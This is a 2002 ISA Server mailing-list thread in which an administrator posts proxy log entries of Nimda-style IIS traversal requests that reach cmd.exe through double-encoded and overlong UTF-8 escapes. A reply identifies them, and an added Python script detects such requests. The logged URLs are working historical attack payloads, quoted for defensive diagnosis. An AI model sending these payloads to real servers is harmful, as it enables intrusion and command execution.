Hi Jim,

I did not find these kinds of entries in the IIS logs, and in the ISA logs, for other entries, I find the source address as 10.3.x.x, which is my internal network. But for these entries containing the scripts I find the IP address coming from 202.x.x.x, which are valid on the Internet, so I am getting these requests from the Internet to my ISA. Is someone trying to send these scripts to my IIS behind ISA? I have scanned IIS and other servers of my network for Nimda but did not find anything.

Regards,
vinay.

-----Original Message-----
From: Jim Harrison [mailto:jim@xxxxxxxxxxxx]
Sent: Tuesday, February 26, 2002 8:03 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Re: ISA logs.

http://www.ISAserver.org

Those are Nimda requests. Since the sc-result code is 401 for all of them, it appears that ISA may be allowing them to pass. "401" could be coming from ISA or the IIS service.
What entries do you find in the IIS logs?

Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!

----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Sunday, February 24, 2002 19:44
Subject: [isalist] ISA logs.

Hi Jim,

This is what I am getting in the ISA logs. I have used xxx.xxx.xx.xx to denote a valid IP on the Internet. If the IP is a valid one on the Internet, then these scripts are coming from the Internet. Please confirm what has to be done to stop these scripts being executed.

xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04 w3proxy ISA - www - - - 145 3518 http TCP GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:08 w3proxy
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:11 w3proxy
anonymous - N 2002-02-23 05:57:11 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13 w3proxy ISA - www - - - 98 3518 http TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 401 - - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17 w3proxy ISA - www - - - 100 3518 http TCP GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 401 - - -

Regards,
vinay.
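
The following is an added example, not code from the thread or from ISA Server: it canonicalises logged URLs the way a permissive decoder would and flags the double-encoded and overlong-UTF-8 traversal requests quoted in the log above. The function names, finding labels and the last sample line (a constructed benign request) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

HEX_ESCAPE = re.compile(rb"%[0-9a-fA-F]{2}")
OVERLONG = re.compile(rb"[\xc0\xc1][\x00-\xff]")  # 0xC0/0xC1 never start valid UTF-8
REQUEST = re.compile(r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}).*?\b(?:GET|POST|HEAD) +(\S+)")
# First three lines are copied from the thread's log; the last one is constructed.
SAMPLE_LOG = """\
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13 w3proxy ISA - www - - - 98 3518 http TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 401 - - -
10.3.0.5 anonymous - N 2002-02-23 05:58:00 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/default.htm - - 200 - - -
"""

def _fold_overlong(m):
    # Lenient two-byte decode: what a permissive decoder turns the pair into.
    b1, b2 = m.group(0)
    return bytes([((b1 & 0x1F) << 6) | (b2 & 0x3F)])

def classify_url(url):
    """Return (canonical_url, findings) for one logged URL."""
    findings = set()
    data = unquote_to_bytes(url)
    for _ in range(3):  # escapes that survive one decode pass were nested
        if not HEX_ESCAPE.search(data):
            break
        findings.add("double-encoding")
        data = unquote_to_bytes(data)
    if OVERLONG.search(data):
        findings.add("overlong-utf8")
        data = OVERLONG.sub(_fold_overlong, data)
    path = data.decode("latin-1").replace("\\", "/").lower()
    if "/../" in path:
        findings.add("traversal")
    if "cmd.exe" in path:
        findings.add("cmd.exe")
    return path, findings

def scan(log_text):
    """Return (timestamp, canonical_url, findings) for each suspicious request."""
    hits = []
    for m in REQUEST.finditer(log_text):
        path, findings = classify_url(m.group(2))
        if findings:
            hits.append((m.group(1), path, sorted(findings)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

All three encodings reduce to the same canonical path, which is why matching on the raw URL string alone misses variants.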